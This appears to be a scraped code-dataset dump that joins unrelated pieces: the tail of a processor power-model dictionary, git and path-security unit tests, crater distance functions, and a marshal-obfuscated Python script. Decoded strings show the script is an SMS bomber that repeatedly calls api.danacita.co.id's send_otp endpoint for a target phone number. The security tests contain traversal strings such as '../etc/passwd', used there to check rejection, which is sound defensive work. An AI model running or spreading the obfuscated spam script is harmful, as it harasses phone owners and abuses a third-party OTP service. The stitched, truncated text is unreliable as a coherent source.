'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.68526,
'Instruction Fetch Unit/Runtime Dynamic': 0.511813,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0382461,
'L2/Runtime Dynamic': 0.0083586,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.12016,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.38594,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0932732,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0932732,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.56062,
'Load Store Unit/Runtime Dynamic': 1.9392,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.229996,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.459992,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0816263,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0822004,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.264871,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0328147,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.5612,
'Memory Management Unit/Runtime Dynamic': 0.115015,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 20.2535,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.167778,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0121743,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.111723,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.291676,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.89808,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 1.7987100371612288,
'Runtime Dynamic': 1.7987100371612288,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.129484,
'Runtime Dynamic': 0.0800318,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 91.1337,
'Peak Power': 124.246,
'Runtime Dynamic': 25.736,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 91.0042,
'Total Cores/Runtime Dynamic': 25.656,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.129484,
'Total L3s/Runtime Dynamic': 0.0800318,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.017505
| 124
| 0.681883
| 8,082
| 68,566
| 5.779015
| 0.067434
| 0.123667
| 0.113048
| 0.093521
| 0.940051
| 0.932022
| 0.919368
| 0.886974
| 0.862352
| 0.843168
| 0
| 0.131246
| 0.22447
| 68,566
| 914
| 125
| 75.017505
| 0.747099
| 0
| 0
| 0.642232
| 0
| 0
| 0.657824
| 0.048128
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8fc4bec5f6473acf09666ea1528eb3c991276156
| 4,517
|
py
|
Python
|
tests/unit/raptiformica/shell/git/test_ensure_latest_source.py
|
vdloo/raptiformica
|
e2807e5e913312034161efcbd74525a4b15b37e7
|
[
"MIT"
] | 21
|
2016-09-04T11:27:31.000Z
|
2019-10-30T08:23:14.000Z
|
tests/unit/raptiformica/shell/git/test_ensure_latest_source.py
|
vdloo/raptiformica
|
e2807e5e913312034161efcbd74525a4b15b37e7
|
[
"MIT"
] | 5
|
2017-09-17T15:59:37.000Z
|
2018-02-03T14:53:32.000Z
|
tests/unit/raptiformica/shell/git/test_ensure_latest_source.py
|
vdloo/raptiformica
|
e2807e5e913312034161efcbd74525a4b15b37e7
|
[
"MIT"
] | 2
|
2017-11-21T18:14:51.000Z
|
2017-11-22T01:20:45.000Z
|
from os.path import join
from raptiformica.settings import conf
from raptiformica.shell.git import ensure_latest_source
from tests.testcase import TestCase
class TestEnsureLatestSource(TestCase):
def setUp(self):
self.log = self.set_up_patch('raptiformica.shell.git.log')
self.run_command = self.set_up_patch('raptiformica.shell.git.run_command')
self.run_command.return_value = (0, 'standard out output', None)
self.ensure_latest_source_success_factory = self.set_up_patch(
'raptiformica.shell.git.ensure_latest_source_success_factory'
)
self.ensure_latest_source_failure_factory = self.set_up_patch(
'raptiformica.shell.git.ensure_latest_source_failure_factory'
)
def test_ensure_latest_source_logs_ensuring_latest_source_message(self):
ensure_latest_source(
"https://github.com/vdloo/puppetfiles",
"puppetfiles", host='1.2.3.4', port=22
)
self.assertTrue(self.log.info.called)
def test_ensure_latest_source_creates_ensure_latest_source_success_callback(self):
ensure_latest_source(
"https://github.com/vdloo/puppetfiles",
"puppetfiles", host='1.2.3.4', port=22
)
self.ensure_latest_source_success_factory.assert_called_once_with(
'/usr/etc/puppetfiles',
host='1.2.3.4', port=22
)
def test_ensure_latest_source_creates_ensure_latest_source_failure_callback(self):
ensure_latest_source(
"https://github.com/vdloo/puppetfiles",
"puppetfiles", host='1.2.3.4', port=22
)
self.ensure_latest_source_failure_factory.assert_called_once_with(
"https://github.com/vdloo/puppetfiles",
'/usr/etc/puppetfiles',
host='1.2.3.4', port=22
)
def test_ensure_latest_source_runs_directory_exists_command(self):
ensure_latest_source(
"https://github.com/vdloo/puppetfiles",
"puppetfiles", host='1.2.3.4', port=22,
)
expected_command = ['test', '-d', '/usr/etc/puppetfiles']
self.run_command.assert_called_once_with(
expected_command,
host='1.2.3.4', port=22,
success_callback=self.ensure_latest_source_success_factory.return_value,
failure_callback=self.ensure_latest_source_failure_factory.return_value
)
def test_ensure_latest_source_returns_directory_status_exit_code(self):
ret = ensure_latest_source(
"https://github.com/vdloo/puppetfiles",
"puppetfiles", host='1.2.3.4', port=22,
)
self.assertEqual(ret, 0)
def test_ensure_latest_source_creates_success_callback_with_default_provisioning_directory(self):
ensure_latest_source(
"https://github.com/vdloo/puppetfiles",
"puppetfiles", host='1.2.3.4', port=22
)
self.ensure_latest_source_success_factory.assert_called_once_with(
join(conf().INSTALL_DIR, 'puppetfiles'), host='1.2.3.4', port=22
)
def test_ensure_latest_source_creates_failure_callback_with_default_provisioning_directory(self):
ensure_latest_source(
"https://github.com/vdloo/puppetfiles",
"puppetfiles", host='1.2.3.4', port=22
)
self.ensure_latest_source_failure_factory.assert_called_once_with(
"https://github.com/vdloo/puppetfiles",
join(conf().INSTALL_DIR, 'puppetfiles'), host='1.2.3.4', port=22
)
def test_ensure_latest_source_creates_success_callback_with_specified_provisioning_directory(self):
ensure_latest_source(
"https://github.com/vdloo/puppetfiles",
"puppetfiles", host='1.2.3.4', port=22,
destination='/tmp/some/directory'
)
self.ensure_latest_source_success_factory.assert_called_once_with(
'/tmp/some/directory/puppetfiles', host='1.2.3.4', port=22
)
def test_ensure_latest_source_creates_failure_callback_with_specified_provisioning_directory(self):
ensure_latest_source(
"https://github.com/vdloo/puppetfiles",
"puppetfiles", host='1.2.3.4', port=22,
destination='/tmp/some/directory'
)
self.ensure_latest_source_failure_factory.assert_called_once_with(
"https://github.com/vdloo/puppetfiles",
'/tmp/some/directory/puppetfiles', host='1.2.3.4', port=22
)
| 38.939655
| 103
| 0.6677
| 552
| 4,517
| 5.117754
| 0.146739
| 0.144425
| 0.210265
| 0.140177
| 0.821239
| 0.798584
| 0.732035
| 0.703009
| 0.703009
| 0.662655
| 0
| 0.027944
| 0.2236
| 4,517
| 115
| 104
| 39.278261
| 0.777588
| 0
| 0
| 0.478723
| 0
| 0
| 0.227585
| 0.053133
| 0
| 0
| 0
| 0
| 0.095745
| 1
| 0.106383
| false
| 0
| 0.042553
| 0
| 0.159574
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
64e372098b425387407ebadf2f2d47e44e709790
| 1,090
|
py
|
Python
|
tests/test_security.py
|
Club-Alpin-Annecy/Flask-Images
|
5c0d4028d3e6e04769ab7bb68258c02cd4769406
|
[
"BSD-3-Clause"
] | 75
|
2015-01-07T20:25:53.000Z
|
2021-11-01T17:49:00.000Z
|
tests/test_security.py
|
Club-Alpin-Annecy/Flask-Images
|
5c0d4028d3e6e04769ab7bb68258c02cd4769406
|
[
"BSD-3-Clause"
] | 30
|
2015-01-07T19:57:58.000Z
|
2021-08-31T09:14:33.000Z
|
tests/test_security.py
|
Club-Alpin-Annecy/Flask-Images
|
5c0d4028d3e6e04769ab7bb68258c02cd4769406
|
[
"BSD-3-Clause"
] | 46
|
2015-01-14T03:09:03.000Z
|
2022-02-01T20:18:50.000Z
|
from . import *
class TestSecurity(TestCase):
def test_path_normalization(self):
self.assertRaises(ValueError, url_for, 'images', filename='/etc//passwd')
self.assertRaises(ValueError, url_for, 'images', filename='/./etc/passwd')
self.assertRaises(ValueError, url_for, 'images', filename='/etc/./passwd')
self.assertRaises(ValueError, url_for, 'images', filename='/something/../etc/passwd')
self.assertRaises(ValueError, url_for, 'images', filename='../etc/passwd')
self.assertRaises(ValueError, url_for, 'images', filename='http://example.com/../photo.jpg')
def test_invalid_scheme(self):
self.assertRaises(ValueError, url_for, 'images', filename='file:///etc/passwd')
def test_invalid_scheme_with_netloc(self):
self.assertRaises(ValueError, url_for, 'images', filename='file://../etc/passwd')
def test_valid_paths(self):
url_for('images', filename='http://example.com/photo.jpg')
url_for('images', filename='relative/path.jpg')
url_for('images', filename='/absolute/path.jpg')
| 43.6
| 100
| 0.683486
| 128
| 1,090
| 5.65625
| 0.257813
| 0.09116
| 0.18232
| 0.303867
| 0.790055
| 0.730663
| 0.730663
| 0.730663
| 0.725138
| 0.63674
| 0
| 0
| 0.149541
| 1,090
| 24
| 101
| 45.416667
| 0.781014
| 0
| 0
| 0
| 0
| 0
| 0.250689
| 0.022039
| 0
| 0
| 0
| 0
| 0.470588
| 1
| 0.235294
| false
| 0.411765
| 0.058824
| 0
| 0.352941
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
8f616923183bea6d7cf99837c09050a664b5e6a8
| 3,890
|
py
|
Python
|
src/utils/distance.py
|
aliFrancis/mars-crater-catalogue
|
5e6ac4e1f7967b1d37d95e436edaa31ef2f2ed55
|
[
"CC-BY-4.0"
] | null | null | null |
src/utils/distance.py
|
aliFrancis/mars-crater-catalogue
|
5e6ac4e1f7967b1d37d95e436edaa31ef2f2ed55
|
[
"CC-BY-4.0"
] | null | null | null |
src/utils/distance.py
|
aliFrancis/mars-crater-catalogue
|
5e6ac4e1f7967b1d37d95e436edaa31ef2f2ed55
|
[
"CC-BY-4.0"
] | null | null | null |
import math
def flat_2D(point1,point2):
if point1[0] == point2[0]:
return 999999999.
else:
return math.sqrt((point1[2]-point2[2])**2 + (point1[3]-point2[3])**2)
def flat_3D(point1,point2):
if point1[0] == point2[0]:
return 999999999.
else:
return math.sqrt((point1[2]-point2[2])**2 + (point1[3]-point2[3])**2 + (point1[4]-point2[4])**2)
def scaled_2D(point1,point2):
"""
Euclidean distance of centres, scaled by average of the two diameters, so that smaller craters appear further away
"""
if point1[0] == point2[0]:
return 999999999.
else:
return 1/((point1[4]+point2[4])/2)*math.sqrt((point1[2]-point2[2])**2 + (point1[3]-point2[3])**2)
def scaled_3D(point1,point2):
"""
Euclidean distance including diameter, scaled by average of the two diameters, so that smaller craters appear further away
"""
if point1[0] == point2[0]:
return 999999999.
else:
return 1/((point1[4]+point2[4])/2)*math.sqrt((point1[2]-point2[2])**2 + (point1[3]-point2[3])**2 + (point1[4]-point2[4])**2)
def negative_jaccard(point1,point2):
"""
Calculates (1 - amount) of overlap as fraction of total union area of two craters
"""
if point1[0] == point2[0]:
return 999999999.
x1,y1,D1 = point1[2:5]
x2,y2,D2 = point2[2:5]
r1 = D1/2
r2 = D2/2
d = math.sqrt(math.pow(x1-x2,2)+math.pow(y1-y2,2))
if x1==x2 and y1==y2 and r1==r2:
return 0
elif d<abs(r1-r2):
A = math.pi*math.pow(min(r1,r2),2)
elif d<r1+r2:
A = math.pow(r1,2)*math.acos((math.pow(d,2)+math.pow(r1,2)-math.pow(r2,2))/(2*d*r1)) + \
math.pow(r2,2)*math.acos((math.pow(d,2)+math.pow(r2,2)-math.pow(r1,2))/(2*d*r2)) - \
(1/2)*math.sqrt((-d+r1+r2)*(d+r1-r2)*(d-r1+r2)*(d+r1+r2))
else:
return 1
return 1 - A/(math.pi*math.pow(r1,2)+math.pi*math.pow(r2,2)-A)
def negative_jaccard_with_diameter_priority(point1,point2):
"""
Calculates (1 - amount) of overlap as fraction of total union area of two craters,
then multiplies by relative size difference of circles.
"""
if point1[0] == point2[0]:
return 999999999.
x1,y1,D1 = point1[2:5]
x2,y2,D2 = point2[2:5]
r1 = D1/2
r2 = D2/2
d = math.sqrt(math.pow(x1-x2,2)+math.pow(y1-y2,2))
size_ratio = max(r1/r2,r2/r1)
if x1==x2 and y1==y2 and r1==r2:
return 0
elif d<abs(r1-r2):
A = math.pi*math.pow(min(r1,r2),2)
elif d<r1+r2:
A = math.pow(r1,2)*math.acos((math.pow(d,2)+math.pow(r1,2)-math.pow(r2,2))/(2*d*r1)) + \
math.pow(r2,2)*math.acos((math.pow(d,2)+math.pow(r2,2)-math.pow(r1,2))/(2*d*r2)) - \
(1/2)*math.sqrt((-d+r1+r2)*(d+r1-r2)*(d-r1+r2)*(d+r1+r2))
else:
return size_ratio
return size_ratio*(1 - A/(math.pi*math.pow(r1,2)+math.pi*math.pow(r2,2)-A))
def negative_jaccard_plus_distance(point1,point2):
"""
Calculates (1 - amount) of overlap as fraction of total union area of two craters, if overlap is
zero then distance defined by flat_2D distance between centres, normalised by (r1+r2)
"""
if point1[0] == point2[0]:
return 999999999.
x1,y1,D1 = point1[2:5]
x2,y2,D2 = point2[2:5]
r1 = D1/2
r2 = D2/2
d = math.sqrt(math.pow(x1-x2,2)+math.pow(y1-y2,2))
if x1==x2 and y1==y2 and r1==r2:
return 0
elif d<abs(r1-r2):
A = math.pi*math.pow(min(r1,r2),2)
elif d<r1+r2:
A = math.pow(r1,2)*math.acos((math.pow(d,2)+math.pow(r1,2)-math.pow(r2,2))/(2*d*r1)) + \
math.pow(r2,2)*math.acos((math.pow(d,2)+math.pow(r2,2)-math.pow(r1,2))/(2*d*r2)) - \
(1/2)*math.sqrt((-d+r1+r2)*(d+r1-r2)*(d-r1+r2)*(d+r1+r2))
else:
return flat_2D(point1,point2)/(r1+r2)
return 1 - A/(math.pi*math.pow(r1,2)+math.pi*math.pow(r2,2)-A)
| 33.534483
| 132
| 0.581234
| 701
| 3,890
| 3.201141
| 0.115549
| 0.121658
| 0.053476
| 0.053476
| 0.83779
| 0.83779
| 0.83779
| 0.83779
| 0.83779
| 0.83779
| 0
| 0.131492
| 0.217995
| 3,890
| 115
| 133
| 33.826087
| 0.60618
| 0.164781
| 0
| 0.78481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088608
| false
| 0
| 0.012658
| 0
| 0.35443
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8f7317b815ca2b0393a7024800c1ee73979e937f
| 155
|
py
|
Python
|
src/spaceone/monitoring/info/__init__.py
|
jihyungSong/plugin-aws-health
|
a3e43dff6c7c5c2e911bc5141807e124ee8be2fe
|
[
"Apache-2.0"
] | 2
|
2020-06-22T01:48:21.000Z
|
2020-08-07T05:22:55.000Z
|
src/spaceone/monitoring/info/__init__.py
|
jihyungSong/plugin-aws-health
|
a3e43dff6c7c5c2e911bc5141807e124ee8be2fe
|
[
"Apache-2.0"
] | null | null | null |
src/spaceone/monitoring/info/__init__.py
|
jihyungSong/plugin-aws-health
|
a3e43dff6c7c5c2e911bc5141807e124ee8be2fe
|
[
"Apache-2.0"
] | 3
|
2020-09-09T03:34:25.000Z
|
2021-03-25T05:19:40.000Z
|
from spaceone.monitoring.info.log_info import *
from spaceone.monitoring.info.common_info import *
from spaceone.monitoring.info.data_source_info import *
| 38.75
| 55
| 0.845161
| 22
| 155
| 5.772727
| 0.409091
| 0.283465
| 0.519685
| 0.614173
| 0.566929
| 0.566929
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077419
| 155
| 3
| 56
| 51.666667
| 0.888112
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
71058c27eebdcb5c964f297ce99e6fad8a6e016d
| 5,590
|
py
|
Python
|
X/don.py
|
PikriArt31/FULL-SPAM3
|
35b36e912f07f6d3280557c5e4e6f1addb386332
|
[
"BSD-3-Clause"
] | null | null | null |
X/don.py
|
PikriArt31/FULL-SPAM3
|
35b36e912f07f6d3280557c5e4e6f1addb386332
|
[
"BSD-3-Clause"
] | null | null | null |
X/don.py
|
PikriArt31/FULL-SPAM3
|
35b36e912f07f6d3280557c5e4e6f1addb386332
|
[
"BSD-3-Clause"
] | null | null | null |
#Compiled By ANKER
#https://github.com/4NK3R
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\t\x08\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-\x00\x00\x00@\x00\x00\x00s\xb6\x01\x00\x00d\x00d\x01l\x00Z\x00d\x00d\x01l\x01Z\x01d\x00d\x01l\x02Z\x02d\x00d\x01l\x03Z\x03d\x00d\x02l\x04m\x05Z\x05\x01\x00d\x03Z\x06d\x04Z\x07d\x05Z\x08d\x06Z\td\x07Z\nd\x08Z\x0bd\td\n\x84\x00Z\x0cd\x0bd\x0c\x84\x00Z\rd\re\x07\x9b\x00d\x0ee\x07\x9b\x00d\x0fe\x07\x9b\x00d\x10e\x07\x9b\x00d\x11e\x07\x9b\x00d\x12e\x0b\x9b\x00d\x13e\x0b\x9b\x00d\x14e\x07\x9b\x00d\x15e\n\x9b\x00d\x16e\x08\x9b\x00d\x17e\x0b\x9b\x00d\x18e\x0b\x9b\x00d\x14e\x07\x9b\x00d\x19e\n\x9b\x00d\x16e\x08\x9b\x00d\x1ae\x0b\x9b\x00d\x1be\x0b\x9b\x00d\x14e\x07\x9b\x00d\x1ce\n\x9b\x00d\x16e\x08\x9b\x00d\x1de\x0b\x9b\x00d\x1ee\x0b\x9b\x00d\x1f\x9d-Z\x0ee\re\x0e\x83\x01\x01\x00e\x0fe\x08\x9b\x00d e\x0b\x9b\x00d!e\x07\x9b\x00d"e\x08\x9b\x00d#\x9d\x08\x83\x01Z\x10e\x11e\x0fe\x0b\x9b\x00d$e\x07\x9b\x00d%e\x08\x9b\x00d#\x9d\x06\x83\x01\x83\x01Z\x12e\x13e\x12\x83\x01D\x00]~Z\x14e\x00\xa0\x15d&e\x10\x17\x00\xa1\x01j\x16Z\x17d\'e\x17k\x06\x90\x01rze\x18e\x08\x9b\x00d(e\t\x9b\x00d)e\x08\x9b\x00d*e\x10\x9b\x00d+e\x07\x9b\x00d,\x9d\n\x83\x01\x01\x00e\x05d-\x83\x01\x01\x00n.e\x18e\x06\x9b\x00d.e\t\x9b\x00d)e\x08\x9b\x00d*e\x10\x9b\x00d+e\x06\x9b\x00d/\x9d\n\x83\x01\x01\x00e\x05d0\x83\x01\x01\x00\x90\x01q,e\x0c\x83\x00\x01\x00d\x01S\x00)1\xe9\x00\x00\x00\x00N)\x01\xda\x05sleepz\x07\x1b[1;31mz\x07\x1b[1;32mz\x07\x1b[1;33mz\x07\x1b[1;36mz\x07\x1b[1;37mz\x07\x1b[1;35mc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\\\x00\x00\x00t\x00t\x01\x9b\x00d\x01t\x02\x9b\x00d\x02\x9d\x04\x83\x01}\x00|\x00d\x03k\x02r2t\x03\xa0\x04d\x04\xa1\x01\x01\x00t\x03\xa0\x05d\x05\xa1\x01\x01\x00n&|\x00d\x06k\x02rXt\x06t\x02\x9b\x00d\x07\x9d\x02\x83\x01\x01\x00t\x07d\x08\x83\x01\x01\x00t\x08\xa0\t\xa1\x00\x01\x00d\x00S\x00)\tNz\x0eMau Spam Lagi?z\x08[y/n] : \xda\x01yz\x02..z\rpython sms.py\xda\x01nz\nExiting...\xe9\x03\x00\x00\x00)\n\xda\x05input\xda\x01k\xda\x01h\xda\x02os\xda\x05chdir\xda\x06system\xda\x05printr\x02\x00\x00\x00\xda\x03sys\xda\x04exit)\x01Z\x03lag\xa9\x00r\x0f\x00\x00\x00\xda\x00\xda\x04lagi\x13\x00\x00\x00s\x10\x00\x00\x00\x00\x01\x14\x01\x08\x01\n\x01\x0c\x02\x08\x01\x0e\x01\x08\x01r\x11\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s0\x00\x00\x00|\x00d\x01\x17\x00D\x00]"}\x01t\x00j\x01\xa0\x02|\x01\xa1\x01\x01\x00t\x00j\x01\xa0\x03\xa1\x00\x01\x00t\x04d\x02\x83\x01\x01\x00q\x08d\x00S\x00)\x03N\xda\x01\ng\x11\x11\x11\x11\x11\x11\x81?)\x05r\r\x00\x00\x00\xda\x06stdout\xda\x05write\xda\x05flushr\x02\x00\x00\x00)\x02\xda\x01d\xda\x01ar\x0f\x00\x00\x00r\x0f\x00\x00\x00r\x10\x00\x00\x00\xda\x02wr\x1f\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\n\x01r\x18\x00\x00\x00z\x04 z"____ _ __\nz/ / __ \\____ ____ ____ ______(_) /_____ _ \nz/ / / / / __ \\/ __ \\/ __ `/ ___/ / __/ __ `/ \nz/ / /_/ / /_/ / / / / /_/ / /__/ / /_/ /_/ / \nz//_____/\\____/_/ /_/\\__,_/\\___/_/\\__/\\__,_/ \nu|\x00\x00\x00u\'\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97\n\'u\x07\x00\x00\x00u\'\xe2\x95\x91 \'z\x08Author z\x02: Z\x05ANKERu\x1a\x00\x00\x00u\' \xe2\x95\x91\n\'z\x08github z\x18https://github.con/4NK3Ru\x07\x00\x00\x00u\'\xe2\x95\x91\n\'z\x08Youtube z\x10ANKER PRODUCTIONu\x15\x00\x00\x00u\' \xe2\x95\x91\n\'u|\x00\x00\x00u\'\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\n\'z\x0eEx : 88817xxx\nZ\x02Noz\x07 Targetz\x03 > Z\x03JumZ\x03lahz9https://api.danacita.co.id/users/send_otp/?mobile_phone=0Z\x06detailz\x04[+] z\x08Spam ke z\x03+62\xfa\x01 z\tBerhasil 